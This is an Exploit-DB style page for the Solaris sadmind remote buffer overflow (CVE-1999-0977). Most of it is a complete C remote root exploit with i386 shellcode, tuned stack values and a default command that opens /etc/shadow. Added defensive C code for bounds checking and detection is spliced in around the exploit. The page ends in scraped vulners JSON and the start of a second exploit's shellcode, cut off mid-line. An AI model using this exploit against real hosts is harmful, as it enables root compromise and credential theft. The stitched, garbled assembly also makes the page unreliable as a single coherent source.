Solaris 2.5/2.5.1/2.6/7.0 sadmind Buffer Overflow Vulnerability 2
1999-06-24T00:00:00
ID: EDB-ID:19669 | Type: exploitdb | Reporter: Cheez Whiz | Modified: 1999-06-24T00:00:00
Description
Solaris 2.5/2.5.1/2.6/7.0 sadmind Buffer Overflow Vulnerability (2). CVE-1999-0977. Remote exploit for the Solaris platform.
source: http://www.securityfocus.com/bid/866/info
Certain versions of Solaris ship with a version of sadmind which is vulnerable to a remotely exploitable buffer overflow attack. sadmind is the daemon used by Solstice AdminSuite applications to perform distributed system administration operations such as adding users. The sadmind daemon is started automatically by the inetd daemon whenever a request to invoke an operation is received.
Under vulnerable versions of sadmind (2.6 and 7.0 have been tested), if a long string is passed as the client domain argument (ADM_CLIENT_DOMAIN) of a NETMGT_PROC_SERVICE request (issued via clnt_call()), it overruns a fixed-size stack buffer and overwrites the saved return address, so arbitrary code can be executed. The buffer in question appears to hold the client's domain name. The overflow in sadmind takes place in the get_auth() function, part of the /usr/snadm/lib/libmagt.so.2 library. Because sadmind runs as root, any code launched as a result runs with root privileges, resulting in a root compromise.
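The bug class described above, shown as an added example beside its bounded form. This is not Sun's libmagt.so.2 source and not the exploit author's code: the 512-byte buffer size, the names get_auth_vulnerable, get_auth_hardened and authenticate_domain, and the AUTH_* status codes are assumptions chosen to match the exploit's junk values (512 for 2.6, 536 for 7.0). The hardened version makes the two checks a decoder should make before copying an XDR string into a fixed buffer: the declared length must agree with the bytes actually present, and the value must fit the destination with its terminator.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Assumed destination size; the exploit's junk values put the saved
 * registers roughly this far above the buffer. Not Sun's declaration. */
#define DOMAIN_BUF 512
#define EXPLOIT_BUFLEN 1056 /* the page's BUFLEN: 548+8+512-12 */

enum { AUTH_OK = 0, AUTH_ERR_LEN_MISMATCH = -1, AUTH_ERR_TOO_LONG = -2 };

/* Vulnerable pattern (reconstruction of the bug class): the XDR-decoded
 * ADM_CLIENT_DOMAIN string is copied into a fixed stack buffer with no
 * bound, so the exploit's 1056-byte argument runs past the buffer, the
 * saved %ebp and the return address. Only ever call this with a short
 * trusted string; it exists to show the sink, not to be used. */
int get_auth_vulnerable(const char *client_domain)
{
    char domain[DOMAIN_BUF];
    strcpy(domain, client_domain); /* unbounded copy: the overflow */
    return (int)strlen(domain);
}

/* Hardened form: the length the XDR layer decoded must match the bytes
 * present (no embedded or missing NUL), and the value must fit out[]. */
int get_auth_hardened(const char *client_domain, uint32_t declared_len,
                      char *out, size_t outsz)
{
    size_t actual = 0;
    while (actual <= declared_len && client_domain[actual] != '\0')
        actual++;                    /* stops at the NUL, reads at most declared_len+1 bytes */
    if (actual != declared_len)
        return AUTH_ERR_LEN_MISMATCH; /* truncated or over-declared string */
    if (actual >= outsz)
        return AUTH_ERR_TOO_LONG;     /* would not fit with the terminator */
    memcpy(out, client_domain, actual);
    out[actual] = '\0';
    return AUTH_OK;
}

/* Wrapper with the assumed sadmind-sized destination; returns the status. */
int authenticate_domain(const char *client_domain, uint32_t declared_len)
{
    char domain[DOMAIN_BUF];
    return get_auth_hardened(client_domain, declared_len, domain, sizeof domain);
}

/* Feeds the hardened sink an argument of the exploit's size: 1056 NOP
 * bytes (0x90), the filler the page's exploit uses. Constructed input. */
int exploit_sized_argument_status(void)
{
    static char payload[EXPLOIT_BUFLEN + 1];
    memset(payload, 0x90, EXPLOIT_BUFLEN);
    payload[EXPLOIT_BUFLEN] = '\0';
    return authenticate_domain(payload, EXPLOIT_BUFLEN);
}
```

The mismatch check matters on its own: an XDR string arrives with a length word, and a decoder that trusts the length word for the copy but later treats the buffer as NUL-terminated (or the reverse) is the usual way a bounded-looking copy still overflows.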
/**
*** sadmindex - i386 Solaris remote root exploit for /usr/sbin/sadmind
***
*** Tested and confirmed under Solaris 2.6 and 7.0 (i386)
***
*** Usage: % sadmindex -h hostname -c command -s sp -j junk [-o offset] \
*** [-a alignment] [-p]
***
*** where hostname is the hostname of the machine running the vulnerable
*** system administration daemon, command is the command to run as root
*** on the vulnerable machine, sp is the %esp stack pointer value, junk
*** is the number of bytes needed to fill the target stack frame (which
*** should be a multiple of 4), offset is the number of bytes to add to
*** sp to calculate the desired return address, and alignment is the
*** number of bytes needed to correctly align the contents of the exploit
*** buffer.
***
*** If run with a -p option, the exploit will only "ping" sadmind on the
*** remote machine to start it running. The daemon will be otherwise
*** untouched. Since pinging the daemon does not require an exploit
*** buffer to be constructed, you can safely omit the -c, -s, and -j
*** options if you use -p.
***
*** When specifying a command, be sure to pass it to the exploit as a
*** single argument, namely enclose the command string in quotes if it
*** contains spaces or other special shell delimiter characters. The
*** exploit will pass this string without modification to /bin/sh -c on
*** the remote machine, so any normally allowed Bourne shell syntax is
*** also allowed in the command string. The command string and the
*** assembly code to run it must fit inside a buffer of 512 bytes, so
*** the command string has a maximum length of about 390 bytes or so.
***
*** I have provided confirmed %esp stack pointer values for Solaris on a
*** Pentium PC system running Solaris 2.6 5/98 and on a Pentium PC system
*** running Solaris 7.0 10/98. On each system, sadmind was started from
*** an instance of inetd that was started at boot time by init. There
*** is a fair possibility that the demonstration values will not work
*** due to differing sets of environment variables, for example if the
*** running inetd on the remote machine was started manually from an
*** interactive shell. If you find that the sample value for %esp does
*** not work, try adjusting the value by -2048 to 2048 from the sample in
*** increments of 32 for starters. The junk parameter seems to vary from
*** version to version, but the sample values should be appropriate for
*** the listed versions and are not likely to need adjustment. The offset
*** parameter and the alignment parameter have default values that will be
*** used if no overriding values are specified on the command line. The
*** default values should be suitable and it will not likely be necessary
*** to override them.
***
*** Demonstration values for i386 Solaris:
***
*** (2.6) sadmindex -h host.example.com -c "touch HEH" -s 0x080418ec -j 512
*** (7.0) sadmindex -h host.example.com -c "touch HEH" -s 0x08041798 -j 536
***
*** THIS CODE FOR EDUCATIONAL USE ONLY IN AN ETHICAL MANNER
***
*** Cheez Whiz
*** cheezbeast@hotmail.com
***
*** June 24, 1999
**/
#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <sys/time.h>    /* struct timeval */
#include <netinet/in.h>  /* struct in_addr */
#include <rpc/rpc.h>
#define NETMGT_PROG 100232
#define NETMGT_VERS 10
#define NETMGT_PROC_PING 0
#define NETMGT_PROC_SERVICE 1
#define NETMGT_UDP_PING_TIMEOUT 30
#define NETMGT_UDP_PING_RETRY_TIMEOUT 5
#define NETMGT_UDP_SERVICE_TIMEOUT 1
#define NETMGT_UDP_SERVICE_RETRY_TIMEOUT 2
#define NETMGT_HEADER_TYPE 6
#define NETMGT_ARG_INT 3
#define NETMGT_ARG_STRING 9
#define NETMGT_ENDOFARGS "netmgt_endofargs"
#define ADM_FW_VERSION "ADM_FW_VERSION"
#define ADM_CLIENT_DOMAIN "ADM_CLIENT_DOMAIN"
#define ADM_FENCE "ADM_FENCE"
#define BUFLEN 1056 /* 548+8+512-12 */
#define ADDRLEN 8
#define LEN 76
/* #define JUNK 512 */ /* 524-12 (Solaris 2.6) */
/* #define JUNK 536 */ /* 548-12 (Solaris 7.0) */
#define OFFSET 572 /* default offset */
#define ALIGNMENT 0 /* default alignment */
#define NOP 0x90
char shell[] =
/* 0 */ "\xeb\x45" /* jmp springboard */
/* syscall: */
/* 2 */ "\x9a\xff\xff\xff\xff\x07\xff" /* lcall 0x7,0x0 */
/* 9 */ "\xc3" /* ret */
/* start: */
/* 10 */ "\x5e" /* popl %esi */
/* 11 */ "\x31\xc0" /* xor %eax,%eax */
/* 13 */ "\x89\x46\xb7" /* movl %eax,-0x49(%esi) */
/* 16 */ "\x88\x46\xbc" /* movb %al,-0x44(%esi) */
/* execve: */
/* 19 */ "\x31\xc0" /* xor %eax,%eax */
/* 21 */ "\x50" /* pushl %eax */
/* 22 */ "\x56" /* pushl %esi */
/* 23 */ "\x8b\x1e" /* movl (%esi),%ebx */
/* 25 */ "\xf7\xdb" /* negl %ebx */
/* 27 */ "\x89\xf7" /* movl %esi,%edi */
/* 29 */ "\x83\xc7\x10" /* addl $0x10,%edi */
/* 32 */ "\x57" /* pushl %edi */
/* 33 */ "\x89\x3e" /* movl %edi,(%esi) */
/* 35 */ "\x83\xc7\x08" /* addl $0x8,%edi */
/* 38 */ "\x88\x47\xff" /* movb %al,-0x1(%edi) */
/* 41 */ "\x89\x7e\x04" /* movl %edi,0x4(%esi) */
/* 44 */ "\x83\xc7\x03" /* addl $0x3,%edi */
/* 47 */ "\x88\x47\xff" /* movb %al,-0x1(%edi) */
/* 50 */ "\x89\x7e\x08" /* movl %edi,0x8(%esi) */
/* 53 */ "\x01\xdf" /* addl %ebx,%edi */
/* 55 */ "\x88\x47\xff" /* movb %al,-0x1(%edi) */
/* 58 */ "\x89\x46\x0c" /* movl %eax,0xc(%esi) */
/* 61 */ "\xb0\x3b" /* movb $0x3b,%al */
/* 63 */ "\xe8\xbe\xff\xff\xff" /* call syscall */
/* 68 */ "\x83\xc4\x0c" /* addl $0xc,%esp */
/* springboard: */
/* 71 */ "\xe8\xbe\xff\xff\xff" /* call start */
/* data: */
/* 76 */ "\xff\xff\xff\xff" /* DATA */
/* 80 */ "\xff\xff\xff\xff" /* DATA */
/* 84 */ "\xff\xff\xff\xff" /* DATA */
/* 88 */ "\xff\xff\xff\xff" /* DATA */
/* 92 */ "\x2f\x62\x69\x6e\x2f\x73\x68\xff" /* DATA */
/* 100 */ "\x2d\x63\xff"; /* DATA */
extern char *optarg;
struct nm_send_header {
struct timeval timeval1;
struct timeval timeval2;
struct timeval timeval3;
unsigned int uint1;
unsigned int uint2;
unsigned int uint3;
unsigned int uint4;
unsigned int uint5;
struct in_addr inaddr1;
struct in_addr inaddr2;
unsigned long ulong1;
unsigned long ulong2;
struct in_addr inaddr3;
unsigned long ulong3;
unsigned long ulong4;
unsigned long ulong5;
struct timeval timeval4;
unsigned int uint6;
struct timeval timeval5;
char *string1;
char *string2;
char *string3;
unsigned int uint7;
};
struct nm_send_arg_int {
char *string1;
unsigned int uint1;
unsigned int uint2;
int int1;
unsigned int uint3;
unsigned int uint4;
};
struct nm_send_arg_string {
char *string1;
unsigned int uint1;
unsigned int uint2;
char *string2;
unsigned int uint3;
unsigned int uint4;
};
struct nm_send_footer {
char *string1;
};
struct nm_send {
struct nm_send_header header;
struct nm_send_arg_int version;
struct nm_send_arg_string string;
struct nm_send_arg_int fence;
struct nm_send_footer footer;
};
struct nm_reply {
unsigned int uint1;
unsigned int uint2;
char *string1;
};
bool_t
xdr_nm_send_header(XDR *xdrs, struct nm_send_header *objp)
{
char *addr;
size_t size = sizeof(struct in_addr);
if (!xdr_long(xdrs, &objp->timeval1.tv_sec))
return (FALSE);
if (!xdr_long(xdrs, &objp->timeval1.tv_usec))
return (FALSE);
if (!xdr_long(xdrs, &objp->timeval2.tv_sec))
return (FALSE);
if (!xdr_long(xdrs, &objp->timeval2.tv_usec))
return (FALSE);
if (!xdr_long(xdrs, &objp->timeval3.tv_sec))
return (FALSE);
if (!xdr_long(xdrs, &objp->timeval3.tv_usec))
return (FALSE);
if (!xdr_u_int(xdrs, &objp->uint1))
return (FALSE);
if (!xdr_u_int(xdrs, &objp->uint2))
return (FALSE);
if (!xdr_u_int(xdrs, &objp->uint3))
return (FALSE);
if (!xdr_u_int(xdrs, &objp->uint4))
return (FALSE);
if (!xdr_u_int(xdrs, &objp->uint5))
return (FALSE);
addr = (char *) &objp->inaddr1.s_addr;
if (!xdr_bytes(xdrs, &addr, &size, size))
return (FALSE);
addr = (char *) &objp->inaddr2.s_addr;
if (!xdr_bytes(xdrs, &addr, &size, size))
return (FALSE);
if (!xdr_u_long(xdrs, &objp->ulong1))
return (FALSE);
if (!xdr_u_long(xdrs, &objp->ulong2))
return (FALSE);
addr = (char *) &objp->inaddr3.s_addr;
if (!xdr_bytes(xdrs, &addr, &size, size))
return (FALSE);
if (!xdr_u_long(xdrs, &objp->ulong3))
return (FALSE);
if (!xdr_u_long(xdrs, &objp->ulong4))
return (FALSE);
if (!xdr_u_long(xdrs, &objp->ulong5))
return (FALSE);
if (!xdr_long(xdrs, &objp->timeval4.tv_sec))
return (FALSE);
if (!xdr_long(xdrs, &objp->timeval4.tv_usec))
return (FALSE);
if (!xdr_u_int(xdrs, &objp->uint6))
return (FALSE);
if (!xdr_long(xdrs, &objp->timeval5.tv_sec))
return (FALSE);
if (!xdr_long(xdrs, &objp->timeval5.tv_usec))
return (FALSE);
if (!xdr_wrapstring(xdrs, &objp->string1))
return (FALSE);
if (!xdr_wrapstring(xdrs, &objp->string2))
return (FALSE);
if (!xdr_wrapstring(xdrs, &objp->string3))
return (FALSE);
if (!xdr_u_int(xdrs, &objp->uint7))
return (FALSE);
return (TRUE);
}
bool_t
xdr_nm_send_arg_int(XDR *xdrs, struct nm_send_arg_int *objp)
{
if (!xdr_wrapstring(xdrs, &objp->string1))
return (FALSE);
if (!xdr_u_int(xdrs, &objp->uint1))
return (FALSE);
if (!xdr_u_int(xdrs, &objp->uint2))
return (FALSE);
if (!xdr_int(xdrs, &objp->int1))
return (FALSE);
if (!xdr_u_int(xdrs, &objp->uint3))
return (FALSE);
if (!xdr_u_int(xdrs, &objp->uint4))
return (FALSE);
return (TRUE);
}
bool_t
xdr_nm_send_arg_string(XDR *xdrs, struct nm_send_arg_string *objp)
{
if (!xdr_wrapstring(xdrs, &objp->string1))
return (FALSE);
if (!xdr_u_int(xdrs, &objp->uint1))
return (FALSE);
if (!xdr_u_int(xdrs, &objp->uint2))
return (FALSE);
if (!xdr_wrapstring(xdrs, &objp->string2))
return (FALSE);
if (!xdr_u_int(xdrs, &objp->uint3))
return (FALSE);
if (!xdr_u_int(xdrs, &objp->uint4))
return (FALSE);
return (TRUE);
}
bool_t
xdr_nm_send_footer(XDR *xdrs, struct nm_send_footer *objp)
{
if (!xdr_wrapstring(xdrs, &objp->string1))
return (FALSE);
return (TRUE);
}
bool_t
xdr_nm_send(XDR *xdrs, struct nm_send *objp)
{
if (!xdr_nm_send_header(xdrs, &objp->header))
return (FALSE);
if (!xdr_nm_send_arg_int(xdrs, &objp->version))
return (FALSE);
if (!xdr_nm_send_arg_string(xdrs, &objp->string))
return (FALSE);
if (!xdr_nm_send_arg_int(xdrs, &objp->fence))
return (FALSE);
if (!xdr_nm_send_footer(xdrs, &objp->footer))
return (FALSE);
return (TRUE);
}
bool_t
xdr_nm_reply(XDR *xdrs, struct nm_reply *objp)
{
if (!xdr_u_int(xdrs, &objp->uint1))
return (FALSE);
if (!xdr_u_int(xdrs, &objp->uint2))
return (FALSE);
if (!xdr_wrapstring(xdrs, &objp->string1))
return (FALSE);
return (TRUE);
}
int
main(int argc, char *argv[])
{
CLIENT *cl;
struct nm_send send;
struct nm_reply reply;
struct timeval tm;
enum clnt_stat stat;
int c, i, len, slen, clen;
char *program, *cp, buf[BUFLEN+1];
char *hostname, *command;
int junk = 0, offset, alignment, pinging = 0;
unsigned long int sp = 0, addr;
program = argv[0];
hostname = "localhost";
command = "chmod 666 /etc/shadow";
offset = OFFSET; alignment = ALIGNMENT;
while ((c = getopt(argc, argv, "h:c:s:j:o:a:p")) != EOF) {
switch (c) {
case 'h':
hostname = optarg;
break;
case 'c':
command = optarg;
break;
case 's':
sp = strtoul(optarg, NULL, 0);
break;
case 'j':
junk = (int) strtol(optarg, NULL, 0);
break;
case 'o':
offset = (int) strtol(optarg, NULL, 0);
break;
case 'a':
alignment = (int) strtol(optarg, NULL, 0);
break;
case 'p':
pinging = 1;
break;
default:
fprintf(stderr, "usage: %s -h hostname -c command -s sp -j junk "
"[-o offset] [-a alignment] [-p]\n", program);
exit(1);
break;
}
}
/* Exploit buffer layout, low to high: copies of the %esp value that fill
 * the target frame (junk bytes, starting at the alignment offset), then
 * ADDRLEN bytes of sp + offset that overwrite the saved frame pointer and
 * the return address, then NOPs up to the shellcode and the command string
 * at the top of the buffer. sp + offset must land in the NOP-filled area
 * between the address words and the shellcode. */
memset(buf, NOP, BUFLEN);
junk &= 0xfffffffc; /* junk must be a multiple of 4 */
for (i = 0, cp = buf + alignment; i < junk / 4; i++) {
*cp++ = (sp >> 0) & 0xff;
*cp++ = (sp >> 8) & 0xff;
*cp++ = (sp >> 16) & 0xff;
*cp++ = (sp >> 24) & 0xff;
}
addr = sp + offset; /* written over the saved %ebp and return address slots */
for (i = 0; i < ADDRLEN / 4; i++) {
*cp++ = (addr >> 0) & 0xff;
*cp++ = (addr >> 8) & 0xff;
*cp++ = (addr >> 16) & 0xff;
*cp++ = (addr >> 24) & 0xff;
}
/* Patch -(strlen(command)+1) into the shellcode's data area at offset LEN;
 * the shellcode negates it to locate the end of the command string. */
slen = strlen(shell); clen = strlen(command);
len = clen; len++; len = -len;
shell[LEN+0] = (len >> 0) & 0xff;
shell[LEN+1] = (len >> 8) & 0xff;
shell[LEN+2] = (len >> 16) & 0xff;
shell[LEN+3] = (len >> 24) & 0xff;
/* Shellcode immediately followed by the command; the shellcode replaces the
 * trailing 0xff with a NUL before execve("/bin/sh", {"/bin/sh", "-c", command}). */
cp = buf + BUFLEN - 1 - clen - slen;
memcpy(cp, shell, slen); cp += slen;
memcpy(cp, command, clen); cp += clen;
*cp = '\xff';
buf[BUFLEN] = '\0';
memset(&send, 0, sizeof(struct nm_send));
memset(&reply, 0, sizeof(struct nm_reply)); /* string1 must be NULL so xdr_wrapstring allocates on decode */
send.header.uint2 = NETMGT_HEADER_TYPE;
send.header.string1 = "";
send.header.string2 = "";
send.header.string3 = "";
send.header.uint7 =
strlen(ADM_FW_VERSION) + 1 +
(4 * sizeof(unsigned int)) + sizeof(int) +
strlen(ADM_CLIENT_DOMAIN) + 1 +
(4 * sizeof(unsigned int)) + strlen(buf) + 1 +
strlen(ADM_FENCE) + 1 +
(4 * sizeof(unsigned int)) + sizeof(int) +
strlen(NETMGT_ENDOFARGS) + 1;
send.version.string1 = ADM_FW_VERSION;
send.version.uint1 = NETMGT_ARG_INT;
send.version.uint2 = sizeof(int);
send.version.int1 = 1;
send.string.string1 = ADM_CLIENT_DOMAIN;
send.string.uint1 = NETMGT_ARG_STRING;
send.string.uint2 = strlen(buf);
send.string.string2 = buf;
send.fence.string1 = ADM_FENCE;
send.fence.uint1 = NETMGT_ARG_INT;
send.fence.uint2 = sizeof(int);
send.fence.int1 = 666;
send.footer.string1 = NETMGT_ENDOFARGS;
cl = clnt_create(hostname, NETMGT_PROG, NETMGT_VERS, "udp");
if (cl == NULL) {
clnt_pcreateerror("clnt_create");
exit(1);
}
/* AUTH_UNIX credentials claiming uid 0 and gid 0 from "localhost" */
cl->cl_auth = authunix_create("localhost", 0, 0, 0, NULL);
if (!pinging) {
fprintf(stdout,
"%%esp 0x%08lx offset %d --> return address 0x%08lx [%d+%d]\n",
sp, offset, addr, alignment, junk);
tm.tv_sec = NETMGT_UDP_SERVICE_TIMEOUT; tm.tv_usec = 0;
if (!clnt_control(cl, CLSET_TIMEOUT, (char *) &tm)) {
fprintf(stderr, "exploit failed; unable to set timeout\n");
exit(1);
}
tm.tv_sec = NETMGT_UDP_SERVICE_RETRY_TIMEOUT; tm.tv_usec = 0;
if (!clnt_control(cl, CLSET_RETRY_TIMEOUT, (char *) &tm)) {
fprintf(stderr, "exploit failed; unable to set timeout\n");
exit(1);
}
stat = clnt_call(cl, NETMGT_PROC_SERVICE,
xdr_nm_send, (caddr_t) &send,
xdr_nm_reply, (caddr_t) &reply, tm);
if (stat != RPC_SUCCESS) {
clnt_perror(cl, "clnt_call");
fprintf(stdout, "now check if exploit worked; "
"RPC failure was expected\n");
exit(0);
}
fprintf(stderr, "exploit failed; "
"RPC succeeded and returned { %u, %u, \"%s\" }\n",
reply.uint1, reply.uint2, reply.string1);
clnt_destroy(cl);
exit(1);
} else {
tm.tv_sec = NETMGT_UDP_PING_TIMEOUT; tm.tv_usec = 0;
if (!clnt_control(cl, CLSET_TIMEOUT, (char *) &tm)) {
fprintf(stderr, "exploit failed; unable to set timeout\n");
exit(1);
}
tm.tv_sec = NETMGT_UDP_PING_RETRY_TIMEOUT; tm.tv_usec = 0;
if (!clnt_control(cl, CLSET_RETRY_TIMEOUT, (char *) &tm)) {
fprintf(stderr, "exploit failed; unable to set timeout\n");
exit(1);
}
stat = clnt_call(cl, NETMGT_PROC_PING,
xdr_void, NULL,
xdr_void, NULL, tm);
if (stat != RPC_SUCCESS) {
clnt_perror(cl, "clnt_call");
exit(1);
}
clnt_destroy(cl);
exit(0);
}
}
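A decoder-side check for the same request, added here as an example and not part of the original exploit or of sadmind. It serves both the description of the overflow above and the xdr_nm_send_arg_int, xdr_nm_send_arg_string and xdr_nm_send_footer routines in the exploit: it walks the argument list exactly as those routines lay it out after the NETMGT header (name, type, size, value, two trailing integers, repeated, closed by netmgt_endofargs) and flags a NETMGT_PROC_SERVICE call whose ADM_CLIENT_DOMAIN value is longer than a chosen bound. The 256-byte DOMAIN_LIMIT, the rule that the size field must equal the string's XDR length, and the build_netmgt_args and build_demo helpers are assumptions; the sample request is constructed inline (version argument, client domain argument, footer; the ADM_FENCE argument is omitted) and is not a captured sadmind datagram. The NETMGT header that precedes the argument list is not parsed.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define NETMGT_ARG_INT 3
#define NETMGT_ARG_STRING 9
#define NETMGT_ENDOFARGS "netmgt_endofargs"
#define ADM_CLIENT_DOMAIN "ADM_CLIENT_DOMAIN"
#define DOMAIN_LIMIT 256 /* assumed bound for a domain name; the exploit sends 1056 bytes */

/* XDR (RFC 4506): big-endian 32-bit words; a string is a length word plus bytes padded to 4. */
struct xdr_cur { const uint8_t *p; size_t len, off; };

static int get_u32(struct xdr_cur *c, uint32_t *v)
{
    const uint8_t *b = c->p + c->off;
    if (c->len - c->off < 4) return -1;
    *v = (uint32_t)b[0] << 24 | (uint32_t)b[1] << 16 | (uint32_t)b[2] << 8 | b[3];
    c->off += 4; return 0;
}

static int get_string(struct xdr_cur *c, const uint8_t **s, uint32_t *n)
{
    size_t padded;
    if (get_u32(c, n)) return -1;
    padded = ((size_t)*n + 3) & ~(size_t)3;
    if (c->len - c->off < padded) return -1; /* length word points past the datagram */
    *s = c->p + c->off;
    c->off += padded;
    return 0;
}

static size_t put_u32(uint8_t *o, size_t off, uint32_t v)
{
    o[off] = v >> 24; o[off + 1] = v >> 16; o[off + 2] = v >> 8; o[off + 3] = v;
    return off + 4;
}

static size_t put_string(uint8_t *o, size_t off, const char *s, size_t n)
{
    off = put_u32(o, off, (uint32_t)n);
    memcpy(o + off, s, n);
    while (n % 4) o[off + n++] = 0;
    return off + n;
}

/* Walks the argument list after the NETMGT header as the page's xdr_nm_send_arg_*
 * routines emit it (name, type, size, value, two u32s) until the footer. Returns the
 * byte length of the ADM_CLIENT_DOMAIN value, 0 if absent, -1 if malformed. */
long netmgt_client_domain_len(const uint8_t *buf, size_t len)
{
    struct xdr_cur c = { buf, len, 0 };
    long domain_len = 0;
    for (;;) {
        const uint8_t *name, *val; uint32_t nlen, vlen, type, size, u;
        if (get_string(&c, &name, &nlen)) return -1;
        if (nlen == strlen(NETMGT_ENDOFARGS) && !memcmp(name, NETMGT_ENDOFARGS, nlen))
            return domain_len;
        if (get_u32(&c, &type) || get_u32(&c, &size)) return -1;
        if (type == NETMGT_ARG_INT) {
            if (get_u32(&c, &u)) return -1;
        } else if (type == NETMGT_ARG_STRING) {
            /* assumed rule: the size field must equal the XDR string length */
            if (get_string(&c, &val, &vlen) || vlen != size) return -1;
            if (nlen == strlen(ADM_CLIENT_DOMAIN) && !memcmp(name, ADM_CLIENT_DOMAIN, nlen))
                domain_len = (long)vlen;
        } else {
            return -1; /* unknown argument type */
        }
        if (get_u32(&c, &u) || get_u32(&c, &u)) return -1;
    }
}

/* Detection rule: a malformed list, or a client domain longer than DOMAIN_LIMIT. */
int sadmind_overflow_suspect(const uint8_t *buf, size_t len)
{
    long n = netmgt_client_domain_len(buf, len);
    return n < 0 || n > DOMAIN_LIMIT;
}

/* Emits the list the page's client sends (ADM_FW_VERSION int, client domain string,
 * footer; ADM_FENCE omitted) around a chosen domain. Constructed sample data. */
size_t build_netmgt_args(uint8_t *o, const char *domain, size_t dlen)
{
    size_t off = put_string(o, 0, "ADM_FW_VERSION", 14);
    off = put_u32(o, off, NETMGT_ARG_INT); off = put_u32(o, off, 4); off = put_u32(o, off, 1);
    off = put_u32(o, off, 0); off = put_u32(o, off, 0);
    off = put_string(o, off, ADM_CLIENT_DOMAIN, strlen(ADM_CLIENT_DOMAIN));
    off = put_u32(o, off, NETMGT_ARG_STRING); off = put_u32(o, off, (uint32_t)dlen);
    off = put_string(o, off, domain, dlen);
    off = put_u32(o, off, 0); off = put_u32(o, off, 0);
    return put_string(o, off, NETMGT_ENDOFARGS, strlen(NETMGT_ENDOFARGS));
}

/* Sample requests into demo_req: "example.com", or a 1056-byte NOP-filled domain
 * of the exploit's BUFLEN. Returns the encoded length. */
static uint8_t demo_req[1400], demo_sled[1056];

size_t build_demo(int oversized)
{
    memset(demo_sled, 0x90, sizeof demo_sled);
    if (oversized) return build_netmgt_args(demo_req, (const char *)demo_sled, sizeof demo_sled);
    return build_netmgt_args(demo_req, "example.com", 11);
}
```

The same walk is what an IDS signature for this overflow has to do to avoid matching on the RPC program number alone: decode past the header, find the ADM_CLIENT_DOMAIN argument, and compare its XDR length against a bound. Rejecting a length word that runs past the datagram before any copy is made is the check that keeps the decoder itself from becoming the next over-read.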
The daemon fails to validate input to the amsl_verify() function during a NETMGT_PROC_SERVICE request resulting in a buffer overflow. With a specially crafted request, an attacker can execute arbitrary code as root resulting in a loss of integrity and confidentiality.\n## Solution Description\nCurrently, there are no known workarounds or upgrades to correct this issue. However, Sun Microsystems has released a patch to address this vulnerability.\n\nOS Version - Patch ID\n---------------------\nSunOS 5.7 - 108662-01 \nSunOS 5.7_x86 - 108663-01 \nSunOS 5.6 - 108660-01 \nSunOS 5.6_x86 - 108661-01 \nSunOS 5.5.1 - 108658-01\nSunOS 5.5.1_x86 - 108659-01\nSunOS 5.5 - 108656-01\nSunOS 5.5_x86 - 108657-01\n## Short Description\nA remote overflow exists in the Solaris sadmind daemon. The daemon fails to validate input to the amsl_verify() function during a NETMGT_PROC_SERVICE request resulting in a buffer overflow. With a specially crafted request, an attacker can execute arbitrary code as root resulting in a loss of integrity and confidentiality.\n## References:\n[Vendor Specific Advisory URL](http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=secbull/191)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/1999-q4/0291.html\nKeyword: RPC\nKeyword: Solstice AdminSuite\nKeyword: Remote Procedure Call\nISS X-Force ID: 3688\n[CVE-1999-0977](https://vulners.com/cve/CVE-1999-0977)\nCIAC Advisory: k-013\nCERT VU: 28934\nCERT: CA-2001-11\nCERT: CA-1999-16\nBugtraq ID: 866\n", "modified": "1999-12-10T11:30:24", "published": "1999-12-10T11:30:24", "href": "https://vulners.com/osvdb/OSVDB:2558", "id": "OSVDB:2558", "type": "osvdb", "title": "Solaris sadmind amsl_verify() Remote Overflow", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-01-31T11:56:51", "description": "Solaris sadmind Remote Buffer Overflow Exploit. CVE-1999-0977. 
Remote exploit for solaris platform", "published": "2000-12-01T00:00:00", "type": "exploitdb", "title": "Solaris sadmind Remote Buffer Overflow Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-1999-0977"], "modified": "2000-12-01T00:00:00", "id": "EDB-ID:213", "href": "https://www.exploit-db.com/exploits/213/", "sourceData": "/*************************************************************************\\\r\n** **\r\n** Super Solaris sadmin Exploit by optyx <optyx@uberhax0r.net> **\r\n** based on sadminsparc. and sadminx86.c by Cheez Whiz **\r\n** **\r\n\\*************************************************************************/\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <unistd.h>\r\n#include <string.h>\r\n#include <rpc/rpc.h>\r\n\r\nchar shellsparc[] =\r\n \"\\x20\\xbf\\xff\\xff\\x20\\xbf\\xff\\xff\\x7f\\xff\\xff\\xff\"\r\n \"\\x90\\x03\\xe0\\x5c\\x92\\x22\\x20\\x10\\x94\\x1b\\xc0\\x0f\"\r\n \"\\xec\\x02\\x3f\\xf0\\xac\\x22\\x80\\x16\\xae\\x02\\x60\\x10\"\r\n \"\\xee\\x22\\x3f\\xf0\\xae\\x05\\xe0\\x08\\xc0\\x2d\\xff\\xff\"\r\n \"\\xee\\x22\\x3f\\xf4\\xae\\x05\\xe0\\x03\\xc0\\x2d\\xff\\xff\"\r\n \"\\xee\\x22\\x3f\\xf8\\xae\\x05\\xc0\\x16\\xc0\\x2d\\xff\\xff\"\r\n \"\\xc0\\x22\\x3f\\xfc\\x82\\x10\\x20\\x3b\\x91\\xd0\\x20\\x08\"\r\n \"\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\"\r\n \"\\xff\\xff\\xff\\xff\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x68\\xff\"\r\n \"\\x2d\\x63\\xff\";\r\n\r\nchar shellx86[] =\r\n \"\\xeb\\x45\\x9a\\xff\\xff\\xff\\xff\\x07\\xff\\xc3\\x5e\\x31\"\r\n \"\\xc0\\x89\\x46\\xb7\\x88\\x46\\xbc\\x31\\xc0\\x50\\x56\\x8b\"\r\n \"\\x1e\\xf7\\xdb\\x89\\xf7\\x83\\xc7\\x10\\x57\\x89\\x3e\\x83\"\r\n \"\\xc7\\x08\\x88\\x47\\xff\\x89\\x7e\\x04\\x83\\xc7\\x03\\x88\"\r\n 